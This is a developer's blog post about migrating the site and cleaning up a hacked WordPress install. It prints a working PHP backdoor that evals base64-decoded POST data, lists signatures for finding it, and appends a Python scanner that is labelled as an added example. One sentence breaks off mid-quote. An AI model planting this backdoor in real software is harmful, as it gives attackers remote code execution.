Revelations for November from Apokalypse

A few weeks back I remarked that there were two surprises I wanted to spring on you. Unfortunately, the recent chaos postponed the work involved, but I’ve been able to continue them now that things have settled down.

One is an upgrade of the site. The website software is seriously out of date: I've noticed that searches no longer return results for new content. It is also on an account which doesn't handle quite so much bandwidth, nor disk space. So tonight I'll be taking the site down while I transfer the data to the new server. I've got the updated software installed there, and I've practiced transferring the data. Here's hoping that it goes through in the shortest possible time and without unexpected challenges.

The other is a long-standing surprise that I’ll be able to announce after the site has extra capacity.

I had wanted to get these both out of the way so I could participate in the IronCoder contest for Mac developers, which was stretched out to a whole week! A whole week, and I still wasn't able to participate! Oh well. I'll still attempt to publish what would've been my entry in a week's time. Of course, that means I'll have to do my development in Leopard, using Xcode 3.

Perhaps I should take a month to finish it.

Website was Down Due to Compromised WordPress System

If you attempted to access the site for the past 24+ hours I apologize for the prolonged downtime. I upgraded the WordPress system the blog runs on (complete with fail, and no thanks to the WordPress community in #wordpress for their non-help — I definitely will switch the blog to another system after 1.7’s release, and recommend prospective users to stay away from them and their system), and found compromised files throughout the system.

I believe I have corrected or removed the backdoor mechanisms which spammers have been using against the site, but I have no assurance that the wacky WordPress system the site is now running on is free of other compromised files, or of the security holes through which the crackers originally got in.

Several compromised files had this line inserted at the beginning,

<?php if(md5($_COOKIE['_wp_debugger'])=="5fd808ac028e5197dd69318e32407eb7"){ eval(base64_decode($_POST['file'])); exit; } ?>

Others were disguised as image files, with file extensions of “pngg” and “jpgg”, and beginning with “

If you want to check your site for similarly compromised files and backdoors, search through your site code for signatures such as "qwerty", "4008deadb16536f48b84fdc70f194dac", "find suid files", "_wp_debugger" and "5fd808ac028e5197dd69318e32407eb7". The signatures are sure to change, since they are the tokens that activate the backdoor scripts (the MD5 of the cookie value is compared against the hard-coded hash, and a match lets any POSTed, base64-encoded PHP be eval'd), but at least you have a way to check current installations for these same spammers. A clean search only tells you that these particular droppings are absent; the more reliable check is to compare the installed files against a fresh copy of the same WordPress release and examine anything that differs or was not shipped.
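As an added example, not code from the original post or from WordPress, here is a small scanner that performs the checks described above over a web root: it greps every file for the literal signatures listed, flags the eval(base64_decode(...)) idiom the injected line uses, and reports files with the "pngg"/"jpgg" disguise extensions or image extensions whose contents start with a PHP open tag. The sample site it builds in a temporary directory is constructed for the demonstration; the only real artifact in it is the backdoor line quoted above. Note that "qwerty" is a noisy signature and will also match legitimate content, so treat its hits as leads rather than verdicts.

```python
"""Scan a web root for the WordPress backdoor indicators quoted in the post."""
import os
import re
import shutil
import tempfile

# Literal strings the post lists as indicators of this spammer's backdoors.
SIGNATURES = [
    "qwerty",
    "4008deadb16536f48b84fdc70f194dac",
    "find suid files",
    "_wp_debugger",
    "5fd808ac028e5197dd69318e32407eb7",
]

# Generic pattern for "eval a base64-decoded request parameter", the idiom
# used by the injected line. Assumption: stock WordPress never does this,
# so any hit deserves a look even if the cookie name and hash have changed.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

# Extensions the post reports being used to disguise PHP as images.
FAKE_IMAGE_EXTS = {".pngg", ".jpgg"}
REAL_IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}

# The backdoor line quoted in the post, used here only as sample input.
BACKDOOR_LINE = (
    b"<?php if(md5($_COOKIE['_wp_debugger'])==\"5fd808ac028e5197dd69318e32407eb7\")"
    b"{ eval(base64_decode($_POST['file'])); exit; } ?>\n"
)


def scan_file(path):
    """Return a list of (check, detail) findings for one file; empty if clean."""
    findings = []
    with open(path, "rb") as fh:
        data = fh.read()
    text = data.decode("latin-1")  # never raises; all signatures are ASCII
    for sig in SIGNATURES:
        if sig in text:
            findings.append(("signature", sig))
    if EVAL_B64.search(text):
        findings.append(("eval_base64_decode", ""))
    ext = os.path.splitext(path)[1].lower()
    if ext in FAKE_IMAGE_EXTS:
        findings.append(("fake_image_extension", ext))
    # A genuine image never begins with a PHP open tag.
    if ext in (REAL_IMAGE_EXTS | FAKE_IMAGE_EXTS) and data.lstrip().startswith(b"<?php"):
        findings.append(("php_in_image", ""))
    return findings


def scan_tree(root):
    """Walk a web root and map each suspicious file (relative path) to its findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                results[rel] = hits
    return results


def scan_demo():
    """Build a constructed sample site, scan it, clean up, and return the findings."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    samples = {  # constructed sample files: one clean config, two infected, one real image
        "wp-config.php": b"<?php define('DB_NAME', 'wp'); ?>\n",
        "wp-includes/functions.php": BACKDOOR_LINE + b"<?php function wp_clean() {} ?>\n",
        "wp-content/uploads/logo.pngg": BACKDOOR_LINE,
        "wp-content/uploads/real.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    }
    try:
        for rel, content in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, hits in sorted(scan_demo().items()):
        print(rel, hits)
```

To run it against a live install, call scan_tree("/path/to/wordpress") and review every reported file by hand; the signature list is trivially evaded by changing the cookie name and hash, which is why the eval/base64 and image-content checks are included alongside it.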

All in all, an unhealthy state of affairs for the Content Management System (CMS) industry. The market is still up for grabs.